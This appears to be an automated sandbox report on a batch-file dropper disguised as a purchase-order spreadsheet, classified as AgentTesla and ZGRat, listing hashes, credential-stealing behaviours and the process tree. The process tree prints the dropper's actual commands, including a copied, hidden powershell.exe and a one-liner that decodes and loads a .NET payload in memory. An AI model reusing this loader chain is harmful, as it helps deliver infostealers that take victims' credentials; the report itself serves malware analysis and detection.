Analysis

  • max time kernel
    126s
  • max time network
    127s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240419-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240419-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02/05/2024, 01:13

General

  • Target

    PO.xlsxm.dr.bat

  • Size

    2.9MB

  • MD5

    a266a061c002211e274caa234aed8c4f

  • SHA1

    9d517f1bac79fe71fc849905331ff7f10ac51a4e

  • SHA256

    c1bcceda8e24feed7019bb01a0b147661a01b23cae8a54d2a6fc8935bf1bd7cb

  • SHA512

    3fcca48852732f8f3a31999af7ea83883e44ffe5c90f8e417010c82af5caa4fdaed3a3110926f66cd50927fe0b7b3e967d6163e4584cc746a19ba51cbdee55c4

  • SSDEEP

    49152:+az/pgAObh21hpmsU1uRkGgL3razanTMx2DSbCXc7UnW92:I

Malware Config

Extracted

Family

agenttesla

Credentials

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

  • Detect ZGRat V1 34 IoCs
  • ZGRat

    ZGRat is remote access trojan written in C#.

  • Sets file to hidden 1 TTPs 1 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

  • Executes dropped EXE 1 IoCs
  • Reads WinSCP keys stored on the system 2 TTPs

    Tries to access WinSCP stored sessions.

  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 17 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PO.xlsxm.dr.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4140
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo F "
      2⤵
        PID:1928
      • C:\Windows\system32\xcopy.exe
        xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\PO.xlsxm.dr.bat.Pxi
        2⤵
          PID:1700
        • C:\Windows\system32\attrib.exe
          attrib +s +h C:\Users\Admin\AppData\Local\Temp\PO.xlsxm.dr.bat.Pxi
          2⤵
          • Sets file to hidden
          • Views/modifies file attributes
          PID:1684
        • C:\Users\Admin\AppData\Local\Temp\PO.xlsxm.dr.bat.Pxi
          C:\Users\Admin\AppData\Local\Temp\PO.xlsxm.dr.bat.Pxi -WindowStyle hidden -command "$Udydfldga = Get-Content 'C:\Users\Admin\AppData\Local\Temp\PO.xlsxm.dr.bat' | select-object -Last 1; $Eviptzvmy = [System.Convert]::FromBase64String($Udydfldga);$Ebawdvtqvk = New-Object System.IO.MemoryStream( , $Eviptzvmy );$Dlbpv = New-Object System.IO.MemoryStream;$Maplsau = New-Object System.IO.Compression.GzipStream $Ebawdvtqvk, ([IO.Compression.CompressionMode]::Decompress);$Maplsau.CopyTo( $Dlbpv );$Maplsau.Close();$Ebawdvtqvk.Close();[byte[]] $Eviptzvmy = $Dlbpv.ToArray();[Array]::Reverse($Eviptzvmy); $Jwbidbkxfb = [System.Threading.Thread]::GetDomain().Load($Eviptzvmy); $Gegworgxk = $Jwbidbkxfb.EntryPoint.DeclaringType.GetMethods()[0].Invoke($null, $null) | Out-Null"
          2⤵
          • Executes dropped EXE
          • Adds Run key to start application
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:5056
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            3⤵
            • Adds Run key to start application
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            PID:4080

      Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\Temp\PO.xlsxm.dr.bat.Pxi

              Filesize

              423KB

              MD5

              c32ca4acfcc635ec1ea6ed8a34df5fac

              SHA1

              f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

              SHA256

              73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

              SHA512

              6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ll2inl4g.cpr.ps1

              Filesize

              60B

              MD5

              d17fe0a3f47be24a6453e9ef58c94641

              SHA1

              6ab83620379fc69f80c0242105ddffd7d98d5d9d

              SHA256

              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

              SHA512

              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

            • memory/4080-4922-0x0000000000400000-0x0000000000442000-memory.dmp

              Filesize

              264KB

            • memory/4080-4923-0x0000000074590000-0x0000000074D40000-memory.dmp

              Filesize

              7.7MB

            • memory/4080-4924-0x0000000074590000-0x0000000074D40000-memory.dmp

              Filesize

              7.7MB

            • memory/4080-4927-0x0000000006700000-0x0000000006750000-memory.dmp

              Filesize

              320KB

            • memory/4080-4929-0x0000000074590000-0x0000000074D40000-memory.dmp

              Filesize

              7.7MB

            • memory/4080-4928-0x00000000069A0000-0x00000000069AA000-memory.dmp

              Filesize

              40KB

            • memory/5056-74-0x0000000008520000-0x000000000874B000-memory.dmp

              Filesize

              2.2MB

            • memory/5056-70-0x0000000008520000-0x000000000874B000-memory.dmp

              Filesize

              2.2MB

            • memory/5056-9-0x0000000074590000-0x0000000074D40000-memory.dmp

              Filesize

              7.7MB

            • memory/5056-10-0x00000000059A0000-0x00000000059C2000-memory.dmp

              Filesize

              136KB

            • memory/5056-11-0x0000000005A40000-0x0000000005AA6000-memory.dmp

              Filesize

              408KB

            • memory/5056-12-0x0000000006100000-0x0000000006166000-memory.dmp

              Filesize

              408KB

            • memory/5056-22-0x0000000006170000-0x00000000064C4000-memory.dmp

              Filesize

              3.3MB

            • memory/5056-24-0x00000000068F0000-0x000000000693C000-memory.dmp

              Filesize

              304KB

            • memory/5056-23-0x0000000006840000-0x000000000685E000-memory.dmp

              Filesize

              120KB

            • memory/5056-25-0x0000000007920000-0x00000000079B6000-memory.dmp

              Filesize

              600KB

            • memory/5056-27-0x0000000006DF0000-0x0000000006E12000-memory.dmp

              Filesize

              136KB

            • memory/5056-26-0x0000000006D80000-0x0000000006D9A000-memory.dmp

              Filesize

              104KB

            • memory/5056-28-0x0000000007F70000-0x0000000008514000-memory.dmp

              Filesize

              5.6MB

            • memory/5056-29-0x0000000008BA0000-0x000000000921A000-memory.dmp

              Filesize

              6.5MB

            • memory/5056-30-0x0000000007BC0000-0x0000000007E02000-memory.dmp

              Filesize

              2.3MB

            • memory/5056-31-0x0000000008520000-0x0000000008750000-memory.dmp

              Filesize

              2.2MB

            • memory/5056-32-0x00000000087F0000-0x0000000008882000-memory.dmp

              Filesize

              584KB

            • memory/5056-36-0x0000000008520000-0x000000000874B000-memory.dmp

              Filesize

              2.2MB

            • memory/5056-34-0x0000000008520000-0x000000000874B000-memory.dmp

              Filesize

              2.2MB

            • memory/5056-42-0x0000000008520000-0x000000000874B000-memory.dmp

              Filesize

              2.2MB

            • memory/5056-40-0x0000000008520000-0x000000000874B000-memory.dmp

              Filesize

              2.2MB

            • memory/5056-38-0x0000000008520000-0x000000000874B000-memory.dmp

              Filesize

              2.2MB

            • memory/5056-33-0x0000000008520000-0x000000000874B000-memory.dmp

              Filesize

              2.2MB

            • memory/5056-66-0x0000000008520000-0x000000000874B000-memory.dmp

              Filesize

              2.2MB

            • memory/5056-7-0x0000000005AD0000-0x00000000060F8000-memory.dmp

              Filesize

              6.2MB

            • memory/5056-80-0x0000000008520000-0x000000000874B000-memory.dmp

              Filesize

              2.2MB

            • memory/5056-78-0x0000000008520000-0x000000000874B000-memory.dmp

              Filesize

              2.2MB

            • memory/5056-76-0x0000000008520000-0x000000000874B000-memory.dmp

              Filesize

              2.2MB

            • memory/5056-72-0x0000000008520000-0x000000000874B000-memory.dmp

              Filesize

              2.2MB

            • memory/5056-8-0x0000000074590000-0x0000000074D40000-memory.dmp

              Filesize

              7.7MB

            • memory/5056-68-0x0000000008520000-0x000000000874B000-memory.dmp

              Filesize

              2.2MB

            • memory/5056-64-0x0000000008520000-0x000000000874B000-memory.dmp

              Filesize

              2.2MB

            • memory/5056-62-0x0000000008520000-0x000000000874B000-memory.dmp

              Filesize

              2.2MB

            • memory/5056-60-0x0000000008520000-0x000000000874B000-memory.dmp

              Filesize

              2.2MB

            • memory/5056-58-0x0000000008520000-0x000000000874B000-memory.dmp

              Filesize

              2.2MB

            • memory/5056-56-0x0000000008520000-0x000000000874B000-memory.dmp

              Filesize

              2.2MB

            • memory/5056-54-0x0000000008520000-0x000000000874B000-memory.dmp

              Filesize

              2.2MB

            • memory/5056-52-0x0000000008520000-0x000000000874B000-memory.dmp

              Filesize

              2.2MB

            • memory/5056-51-0x0000000008520000-0x000000000874B000-memory.dmp

              Filesize

              2.2MB

            • memory/5056-48-0x0000000008520000-0x000000000874B000-memory.dmp

              Filesize

              2.2MB

            • memory/5056-46-0x0000000008520000-0x000000000874B000-memory.dmp

              Filesize

              2.2MB

            • memory/5056-45-0x0000000008520000-0x000000000874B000-memory.dmp

              Filesize

              2.2MB

            • memory/5056-96-0x0000000008520000-0x000000000874B000-memory.dmp

              Filesize

              2.2MB

            • memory/5056-94-0x0000000008520000-0x000000000874B000-memory.dmp

              Filesize

              2.2MB

            • memory/5056-86-0x0000000008520000-0x000000000874B000-memory.dmp

              Filesize

              2.2MB

            • memory/5056-84-0x0000000008520000-0x000000000874B000-memory.dmp

              Filesize

              2.2MB

            • memory/5056-82-0x0000000008520000-0x000000000874B000-memory.dmp

              Filesize

              2.2MB

            • memory/5056-92-0x0000000008520000-0x000000000874B000-memory.dmp

              Filesize

              2.2MB

            • memory/5056-90-0x0000000008520000-0x000000000874B000-memory.dmp

              Filesize

              2.2MB

            • memory/5056-88-0x0000000008520000-0x000000000874B000-memory.dmp

              Filesize

              2.2MB

            • memory/5056-4914-0x0000000074590000-0x0000000074D40000-memory.dmp

              Filesize

              7.7MB

            • memory/5056-4916-0x0000000008970000-0x00000000089BC000-memory.dmp

              Filesize

              304KB

            • memory/5056-4915-0x0000000008900000-0x000000000896C000-memory.dmp

              Filesize

              432KB

            • memory/5056-4917-0x00000000089D0000-0x0000000008A24000-memory.dmp

              Filesize

              336KB

            • memory/5056-6-0x0000000002F30000-0x0000000002F66000-memory.dmp

              Filesize

              216KB

            • memory/5056-5-0x000000007459E000-0x000000007459F000-memory.dmp

              Filesize

              4KB

            • memory/5056-4925-0x0000000074590000-0x0000000074D40000-memory.dmp

              Filesize

              7.7MB